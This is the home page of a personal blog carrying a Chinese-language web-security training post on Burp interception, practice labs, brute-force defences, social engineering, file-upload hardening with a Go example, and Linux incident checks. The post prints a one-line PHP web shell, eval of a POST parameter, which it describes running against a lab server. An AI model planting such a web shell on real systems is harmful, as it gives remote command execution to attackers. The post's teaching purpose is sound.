<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<!-- NOTE(review): maximum-scale=2 caps pinch zoom at 200%; dropping it lets low-vision users zoom further without any layout change -->
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<!-- NOTE(review): the two jsdelivr stylesheets are loaded from a third-party origin without integrity/crossorigin (SRI) attributes, so whatever the CDN serves is applied as-is. The "[email protected]" segment in both hrefs looks like an extraction artifact that replaced "@<version>"; confirm the real package versions before pinning SRI hashes -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/[email protected]/css/all.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/animate.min.css">
<!-- Site-wide NexT theme settings, emitted inline at build time. An inline script needs a CSP nonce/hash (or 'unsafe-inline') to run under a script-src policy -->
<script class="hexo-configurations">
// Reuse the NexT namespace if an earlier script already created it.
var NexT = window.NexT || {};
// Theme configuration consumed by the NexT scripts; the i18n strings carry ${...} placeholders that are presumably substituted by the search script (not verified here).
var CONFIG = {"hostname":"zhuang-weiming.github.io","root":"/","images":"/images","scheme":"Muse","version":"8.3.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}};
</script>
<meta property="og:type" content="website">
<meta property="og:title" content="Zhuang's Diary">
<meta property="og:url" content="https://zhuang-weiming.github.io/index.html">
<meta property="og:site_name" content="Zhuang's Diary">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="Weiming Zhuang">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="https://zhuang-weiming.github.io/">
<!-- Per-page flags for the theme scripts (this is the home page, not a post); same inline-script CSP caveat as above -->
<script class="page-configurations">
// https://hexo.io/docs/variables.html
CONFIG.page = {
sidebar: "",
isHome : true,
isPost : false,
lang : 'en'
};
</script>
<title>Zhuang's Diary</title>
<!-- Fallback for browsers without JavaScript: the .use-motion animation classes appear to leave these elements hidden until the theme scripts run, so make them visible here -->
<noscript>
<style>
body { margin-top: 2rem; }
.use-motion .menu-item,
.use-motion .sidebar,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header {
visibility: visible;
}
.use-motion .header,
.use-motion .site-brand-container .toggle,
.use-motion .footer { opacity: initial; }
.use-motion .site-title,
.use-motion .site-subtitle,
.use-motion .custom-logo-image {
opacity: initial;
top: initial;
}
.use-motion .logo-line {
transform: scaleX(1);
}
/* The search overlay and sidebar tabs are JS-driven; hide them and show the panel directly */
.search-pop-overlay, .sidebar-nav { display: none; }
.sidebar-panel { display: block; }
</style>
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
<div class="headband"></div>
<main class="main">
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<div class="site-nav-toggle">
<!-- NOTE(review): role="button" on a <div> with no tabindex or keyboard handler is not reachable from the keyboard, so the role is a promise the markup does not keep. The same applies to .popup-trigger (both occurrences), .popup-btn-close, .sidebar-toggle and .back-to-top below; a <button type="button"> would be focusable without ARIA -->
<div class="toggle" aria-label="Toggle navigation bar" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<i class="logo-line"></i>
<h1 class="site-title">Zhuang's Diary</h1>
<i class="logo-line"></i>
</a>
<p class="site-subtitle" itemprop="description">言之有物,持之以恒</p>
</div>
<div class="site-nav-right">
<!-- Icon-only search trigger with no accessible name; the theme JS presumably binds click on .popup-trigger -->
<div class="toggle popup-trigger">
<i class="fa fa-search fa-fw fa-lg"></i>
</div>
</div>
</div>
<!-- Two <nav> landmarks on this page (site-nav here, site-state in the sidebar); an aria-label on each would let assistive tech tell them apart -->
<nav class="site-nav">
<ul class="main-menu menu">
<li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
<li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li>
<li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
<li class="menu-item menu-item-search">
<!-- NOTE(review): href-less <a role="button"> is not in the tab order; it opens the search overlay below rather than navigating -->
<a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
</a>
</li>
</ul>
</nav>
<div class="search-pop-overlay">
<div class="popup search-popup"><div class="search-header">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<div class="search-input-container">
<!-- NOTE(review): the search box has no <label> or aria-label; the placeholder is its only name and disappears on input -->
<input autocomplete="off" autocapitalize="off" maxlength="80"
placeholder="Searching..." spellcheck="false"
type="search" class="search-input">
</div>
<!-- Icon-only close control: no accessible name (an aria-label="Close" would do) -->
<span class="popup-btn-close" role="button">
<i class="fa fa-times-circle"></i>
</span>
</div>
<div class="search-result-container no-result">
<div class="search-result-icon">
<i class="fa fa-spinner fa-pulse fa-5x"></i>
</div>
</div>
</div>
</div>
</div>
<div class="toggle sidebar-toggle" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
<aside class="sidebar">
<div class="sidebar-inner sidebar-overview-active">
<ul class="sidebar-nav">
<li class="sidebar-nav-toc">
Table of Contents
</li>
<li class="sidebar-nav-overview">
Overview
</li>
</ul>
<div class="sidebar-panel-container">
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
<p class="site-author-name" itemprop="name">Weiming Zhuang</p>
<div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">261</span>
<span class="site-state-item-name">posts</span>
</a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/">
<span class="site-state-item-count">65</span>
<span class="site-state-item-name">tags</span></a>
</div>
</nav>
</div>
<div class="links-of-author site-overview-item animated">
<span class="links-of-author-item">
<!-- External link opens in a new tab with rel="noopener"; nothing in the link text says so -->
<a href="https://www.linkedin.com/in/zhuangweiming/" title="Linkedin → https://www.linkedin.com/in/zhuangweiming/" rel="noopener" target="_blank"><i class="fab fa-linkedin fa-fw"></i>Linkedin</a>
</span>
</div>
</div>
</div>
<div class="back-to-top animated" role="button" aria-label="Back to top">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
</div>
</aside>
<div class="sidebar-dimmer"></div>
</header>
<div class="reading-progress-bar"></div>
<noscript>
<div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
<div class="main-inner index posts-expand">
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/" class="post-title-link" itemprop="url">Web安全培训</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-12-10 17:00:00 / Modified: 17:33:27" itemprop="dateCreated datePublished" datetime="2024-12-10T17:00:00+08:00">2024-12-10</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h2 id="工具介绍"><a href="#工具介绍" class="headerlink" title="工具介绍"></a>工具介绍</h2><p>Burp 抓包,改包工具, 基于java运行,需要JRE<br>需要搭梯子才能登录其网站主页,美国公司,商业软件,年费399,有社区开源版本<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/1.png"><br>Burp未启动时,网络的路由环境<br> 本地(浏览器) — 服务器<br>Burp启动后,网络的路由环境<br> 本地(浏览器 — Burp) — 服务器<br>Burp extensions — <a target="_blank" rel="noopener" href="https://github.com/snoopysecurity/awesome-burp-extensions">https://github.com/snoopysecurity/awesome-burp-extensions</a></p>
<p>DVWA靶场,里面是各种漏洞攻击的介绍和说明,是一个入门的练习资源,英文资源。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/2.png"></p>
<p>Pikachu 漏洞练习平台,同理,中文资源。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/3.png"></p>
<p><a target="_blank" rel="noopener" href="https://www.kali.org/">https://www.kali.org/</a> , 一个Linux发行版本,是专门针对各种信息安全任务或者练习而准备的。</p>
<h2 id="前端一切不可靠,如上Burp在客户端做网络流量拦截,做中间人攻击"><a href="#前端一切不可靠,如上Burp在客户端做网络流量拦截,做中间人攻击" class="headerlink" title="前端一切不可靠,如上Burp在客户端做网络流量拦截,做中间人攻击"></a>前端一切不可靠,如上Burp在客户端做网络流量拦截,做中间人攻击</h2><p>对应的措施:<br>1.后端校验;2.前端不做逻辑判断;3.前端加密混淆;4.移动端加壳;5.反调试检测,防止逆向工程; 6.后台数据库存储字段最好经过KMS后端密文,常见的服务器本地算法 — hash(明文+盐值),口令字段宜使用 bcrypt/scrypt/Argon2 之类的慢哈希<br>通常,<a target="_blank" rel="noopener" href="http://www.website.com/robots.txt">www.website.com/robots.txt</a>,如 <a target="_blank" rel="noopener" href="https://www.bilibili.com/robots.txt">https://www.bilibili.com/robots.txt</a> ,很多网站都有这样子一个网站URL的列表,表示本网站允许访问的URL。</p>
<p>Burp 启动浏览器,在网站的<a target="_blank" rel="noopener" href="http://burp/">http://burp/</a>地址,<br>在网页右上角点击CA Certificate 下载Burp颁发的证书(该 CA 证书只应导入用于测试的浏览器或系统配置,测试结束后移除)。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/4.png"></p>
<p>Burp暴力破解,尝试用户名和密码时,可以使用“Repeater”和“Intruder”两个菜单的功能。<br>通常登录成功后,response 的长度会有不同。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/5.png"><br>暴力破解的本质是 自动化,大量发送请求,猜测密码。<br>应对方法:<br>1.要求用户密码设置的复杂度;<br>2.识别爬虫/机器人:验证码,滑块,随机验证码;<br>3.限制登录频率:两次登录尝试之间需间隔n秒以上,错误m次后冻结该用户x分钟,这样会带来问题:<br>A.前端限制,通过重置本地数据可以绕过;<br>B.IP地址限制,可能会误封正常用户,攻击者租用地址池拥有大量IP。<br>C.账号限制,会造成正常用户无法登录,恶意攻击者可以制造拒绝服务攻击。<br>4.增加密码强度,特别是增加密码长度是最有效的手段。<br>A.密码一户一用,避免一个密码到处使用,避免撞库攻击。<br>密码的本质是进行身份验证的手段。<br>密码的应用场景是基于以下假设:只有用户和服务器知道该密码<br>其他方式验证身份:短信验证码,指纹,面部识别,USBKEY,2FA,多因子验证等等。</p>
<h2 id="社会工程"><a href="#社会工程" class="headerlink" title="社会工程"></a>社会工程</h2><p>黑客通过社会工程学(Social Engineering)实现攻击的手法多种多样,主要是利用人类的心理弱点和信任机制来获取信息或访问权限。<br>钓鱼攻击,尾随攻击,假冒身份,电话攻击,非技术性攻击,社交媒体欺骗,媒体投影攻击,关系建立攻击等等。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/6.png"></p>
<h2 id="OWASP-—-Open-Web-Application-Security-Project"><a href="#OWASP-—-Open-Web-Application-Security-Project" class="headerlink" title="OWASP — Open Web Application Security Project"></a>OWASP — Open Web Application Security Project</h2><p>OWASP Top 10 提供了Web 安全领域发生最频繁的10种事故。最新版本是 2021 年发布的 — <a target="_blank" rel="noopener" href="https://owasp.org/Top10/zh_CN/">https://owasp.org/Top10/zh_CN/</a></p>
<p>WebShell - 以网页形式实现shell的功能,能够对系统进行操作。例如,文件读写,命令执行等。也被称为网页木马。<br>首先,网站如果对用户上传的文件,不做控制,黑客则有可能会上传木马文件,黑客通过木马文件控制后台服务器,如下,<br>通过 <a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/">https://github.com/AntSwordProject/</a> 工具可以执行网页木马。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/7.png"><br>执行木马 <?php eval($_POST['cmd']);?> 成功,成功访问到后端服务器的目录和文件。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/8.png"></p>
<p>仅仅依赖客户端 JavaScript 验证和服务器端 MIME 类型检查仍然不够安全,因为客户端验证很容易被绕过,而且 MIME 类型本身也可能被伪造,尽管概率较低。 为了构建一个更加严谨的文件上传系统,需要采取更全面的安全措施,将验证和安全检查融入整个上传流程的各个阶段。</p>
<p>一个更严谨的文件上传系统应该包含以下措施:</p>
<ol>
<li>客户端验证 (加强):<br>文件类型检查 (加强): 虽然 file.type 相对可靠,但仍然不是绝对安全的。 可以考虑结合一些额外的检查:<br>文件头部信息检查: 读取文件的前几个字节,检查是否符合已知的文件格式规范。 这需要对不同文件类型的头部结构有深入的了解。 但这仍然只能作为辅助手段,不能完全依赖。<br>更严格的正则表达式: 使用更精确的正则表达式来验证文件名,但这仍然不能防止恶意文件伪装。<br>文件大小限制: 设置一个合理的文件大小限制,并进行客户端验证。<br>用户反馈: 提供清晰的用户反馈,告知用户文件上传失败的原因,例如文件类型不允许、文件大小超过限制等。<br>禁止直接拖拽上传: 避免用户直接拖拽文件到上传区域,强制用户通过“选择文件”按钮选择文件,这样可以更好地控制文件上传过程。</li>
<li>服务器端验证 (多层防御):<br>文件类型检查 (多重验证): 不要仅仅依靠 MIME 类型,结合多种方法进行验证:<br>文件签名: 检查文件的魔术数字 (magic number),这是一种非常可靠的方法。 不同的文件格式通常有独特的魔术数字。<br>文件内容分析: 对于一些关键的文件类型,可以进行更深入的内容分析,检查文件结构是否符合规范。 这需要根据具体的文件类型定制相应的分析方法。 这可能需要耗费较多资源。<br>文件大小限制: 设置严格的文件大小限制,防止资源耗尽攻击(Denial of Service,DoS)。<br>临时文件存储: 将上传的文件先保存到一个临时目录,然后再进行后续处理,这样可以避免恶意文件直接影响服务器。<br>文件扩展名检查 (补充): 虽然不完全可靠,但作为附加的检查,可以辅助判断文件的类型。<br>内容安全扫描 (关键): 使用专业的安全扫描工具,扫描上传的文件是否包含恶意代码、病毒或其他有害内容。 这可能是最关键的安全步骤,但会增加系统复杂性和成本。 一些云服务提供商提供此类服务。<br>白名单机制: 只允许特定类型的文件上传。 尽量避免使用黑名单,因为黑名单很难完全覆盖所有的恶意文件类型。<br>沙盒环境: 在沙盒环境中执行文件分析,以最大程度地限制恶意代码对服务器的影响。<br>日志记录: 记录所有的文件上传事件,包括文件名、MIME 类型、文件大小、上传时间以及验证结果。 这有助于追踪和分析安全事件。</li>
<li>其他安全措施:<br>HTTPS: 使用 HTTPS 加密上传过程,防止数据被窃取。<br>输入验证: 对所有用户输入进行严格的验证,防止注入攻击。<br>代码安全审计: 定期对代码进行安全审计,查找和修复潜在的安全漏洞。<br>服务端代码示例,如下:<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span 
class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"> <span class="string">"fmt"</span></span><br><span class="line"> <span class="string">"io"</span></span><br><span class="line"> <span class="string">"mime/multipart"</span></span><br><span class="line"> <span 
class="string">"net/http"</span></span><br><span class="line"> <span class="string">"os"</span></span><br><span class="line"> <span class="string">"path/filepath"</span></span><br><span class="line"> <span class="string">"regexp"</span></span><br><span class="line"> <span class="string">"strings"</span></span><br><span class="line"></span><br><span class="line"> <span class="string">"github.com/gabriel-vasile/mimetype"</span> <span class="comment">// 用于更准确的 MIME 类型检测</span></span><br><span class="line"> <span class="string">"github.com/google/uuid"</span> <span class="comment">// 用于生成唯一的文件名</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment">// AllowedMimeTypes 定义允许上传的文件类型</span></span><br><span class="line"><span class="keyword">var</span> AllowedMimeTypes = <span class="keyword">map</span>[<span class="keyword">string</span>]<span class="keyword">bool</span>{</span><br><span class="line"> <span class="string">"image/jpeg"</span>: <span class="literal">true</span>,</span><br><span class="line"> <span class="string">"image/png"</span>: <span class="literal">true</span>,</span><br><span class="line"> <span class="string">"image/gif"</span>: <span class="literal">true</span>,</span><br><span class="line"> <span class="comment">// 添加其他允许的 MIME 类型</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">// MaxFileSize 定义允许上传的最大文件大小 (字节)</span></span><br><span class="line"><span class="keyword">const</span> MaxFileSize = <span class="number">10</span> * <span class="number">1024</span> * <span class="number">1024</span> <span class="comment">// 10MB</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// uploadHandler 处理文件上传请求</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">uploadHandler</span><span class="params">(w http.ResponseWriter, r 
*http.Request)</span></span> {</span><br><span class="line"> <span class="keyword">if</span> r.Method != http.MethodPost {</span><br><span class="line"> http.Error(w, <span class="string">"Method Not Allowed"</span>, http.StatusMethodNotAllowed)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> file, handler, err := r.FormFile(<span class="string">"file"</span>) <span class="comment">// 假设表单字段名为 "file"</span></span><br><span class="line"> <span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line"> http.Error(w, err.Error(), http.StatusBadRequest)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">defer</span> file.Close()</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 客户端验证 (加强)</span></span><br><span class="line"> fileName := handler.Filename</span><br><span class="line"> <span class="keyword">if</span> !isValidFileName(fileName) { <span class="comment">// 检查文件名是否合法</span></span><br><span class="line"> http.Error(w, <span class="string">"Invalid file name"</span>, http.StatusBadRequest)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> fileSize := handler.Size</span><br><span class="line"> <span class="keyword">if</span> fileSize > MaxFileSize {</span><br><span class="line"> http.Error(w, <span class="string">"File too large"</span>, http.StatusRequestEntityTooLarge)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 服务器端验证 (多层防御)</span></span><br><span class="line"> detectedMimeType, err := mimetype.DetectReader(file)</span><br><span 
class="line"> <span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line"> http.Error(w, <span class="string">"Failed to detect MIME type"</span>, http.StatusInternalServerError)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> !AllowedMimeTypes[detectedMimeType.String()] {</span><br><span class="line"> http.Error(w, <span class="string">"Invalid file type"</span>, http.StatusBadRequest)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 使用 UUID 生成唯一的文件名,避免文件名冲突</span></span><br><span class="line"> newFileName := uuid.New().String() + filepath.Ext(fileName)</span><br><span class="line"> uploadPath := <span class="string">"./uploads/"</span> + newFileName <span class="comment">// 定义上传文件的存储路径</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建上传目录,如果不存在</span></span><br><span class="line"> os.MkdirAll(<span class="string">"./uploads/"</span>, <span class="number">0755</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建文件并保存</span></span><br><span class="line"> newFile, err := os.Create(uploadPath)</span><br><span class="line"> <span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line"> http.Error(w, err.Error(), http.StatusInternalServerError)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">defer</span> newFile.Close()</span><br><span class="line"></span><br><span class="line"> _, err = io.Copy(newFile, file)</span><br><span class="line"> <span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span 
class="line"> http.Error(w, err.Error(), http.StatusInternalServerError)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 此处添加更严格的安全检查,例如:</span></span><br><span class="line"> <span class="comment">// 1. 使用第三方库进行病毒扫描 (ClamAV, VirusTotal API 等)</span></span><br><span class="line"> <span class="comment">// 2. 更深入的文件内容分析,根据文件类型进行特定检查</span></span><br><span class="line"></span><br><span class="line"> fmt.Fprintf(w, <span class="string">"File uploaded successfully: %s\n"</span>, newFileName)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">// isValidFileName 检查文件名是否合法,防止目录遍历攻击等</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">isValidFileName</span><span class="params">(fileName <span class="keyword">string</span>)</span> <span class="title">bool</span></span> {</span><br><span class="line"> re := regexp.MustCompile(<span class="string">`^[a-zA-Z0-9._-]+$`</span>) <span class="comment">// 只允许字母、数字、点、下划线和短横线</span></span><br><span class="line"> <span class="keyword">return</span> re.MatchString(fileName)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line"> http.HandleFunc(<span class="string">"/upload"</span>, uploadHandler)</span><br><span class="line"> fmt.Println(<span class="string">"Server listening on port 8080"</span>)</span><br><span class="line"> http.ListenAndServe(<span class="string">":8080"</span>, <span class="literal">nil</span>)</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
AllowedMimeTypes: 定义了允许上传的文件类型,使用 map[string]bool 更易于管理。<br>MaxFileSize: 设置了最大文件大小限制。注意示例中对 handler.Size 的检查发生在 r.FormFile 已经读完整个请求体之后,要在读取阶段就限制大小,还应配合 http.MaxBytesReader 包装 r.Body。<br>mimetype 库: 使用了 github.com/gabriel-vasile/mimetype 库来更准确地检测 MIME 类型。 这比只依赖 handler.Header.Get("Content-Type") 更可靠。注意 DetectReader 会从 file 读取开头的若干字节且不会回退读取位置,后面的 io.Copy 只会写入剩余内容;复制前应先调用 file.Seek(0, io.SeekStart)。<br>UUID 生成文件名: 使用 UUID 生成唯一的文件名,避免文件名冲突和潜在的安全问题。但扩展名仍取自用户提供的文件名,更稳妥的做法是使用 detectedMimeType.Extension() 得到的扩展名。<br>isValidFileName 函数: 对文件名进行简单的验证,防止目录遍历等攻击。 这只是一个基本的示例,实际应用中可能需要更复杂的验证规则。<br>临时文件存储 (缺失但建议): 为了更安全,应该先将文件保存到临时目录,验证通过后再移动到最终存储位置。<br>安全扫描 (缺失但必须): 代码中用注释标注了需要添加安全扫描的地方。 你需要集成一个专业的安全扫描库或服务 (例如 ClamAV, VirusTotal API 等) 来扫描上传的文件是否包含恶意代码。 这是至关重要的安全步骤。</li>
</ol>
<h2 id="Linux-系统排查"><a href="#Linux-系统排查" class="headerlink" title="Linux 系统排查"></a>Linux 系统排查</h2><p>1.查看用户行为<br>/etc/passwd,/etc/shadow 中存储了account和密码信息,黑客可能会在如上两个文件中添加高权限用户<br>如 macOS 中,<br>➜ ~ sudo dscl . -list /Users | while read user; do sudo dscl . -read /Users/"$user" UserShell | grep -q '/bin/bash' && echo $user; done<br>_mbsetupuser<br>postgres<br>➜ ~ last<br>Zzz ttys000 Tue Dec 10 14:05 still logged in<br>Zzz ttys000 Mon Dec 9 11:29 - 11:29 (00:00)<br>Zzz ttys000 Sat Dec 7 19:35 - 19:35 (00:00)<br>Zzz console Tue Dec 3 14:51 still logged in<br>reboot time Tue Dec 3 14:50<br>还有,如查看用户的密码是否为空,用户执行过的命令,等等。<br>3.查看进程,例如,黑客通过服务器在挖矿等异常。lsof, top等命令。<br>更多可以查看 Linux 应急响应手册 — <a target="_blank" rel="noopener" href="https://github.com/Just-Hack-For-Fun/Linux-INCIDENT-RESPONSE-COOKBOOK">https://github.com/Just-Hack-For-Fun/Linux-INCIDENT-RESPONSE-COOKBOOK</a></p>
<h2 id="威胁情报中心:"><a href="#威胁情报中心:" class="headerlink" title="威胁情报中心:"></a>威胁情报中心:</h2><p>Windows 系统工具 - <a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/sysinternals/">https://learn.microsoft.com/en-us/sysinternals/</a><br>腾讯威胁情报中心 - <a target="_blank" rel="noopener" href="https://tix.qq.com/">https://tix.qq.com/</a><br>可疑文件分析 - <a target="_blank" rel="noopener" href="https://www.virustotal.com/gui/home/upload">https://www.virustotal.com/gui/home/upload</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/11/18/Code-Robot-Agent-Key-Prompt/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/11/18/Code-Robot-Agent-Key-Prompt/" class="post-title-link" itemprop="url">Code-Robot-Agent-Key-Prompt</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-11-18 16:01:00 / Modified: 16:05:09" itemprop="dateCreated datePublished" datetime="2024-11-18T16:01:00+08:00">2024-11-18</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
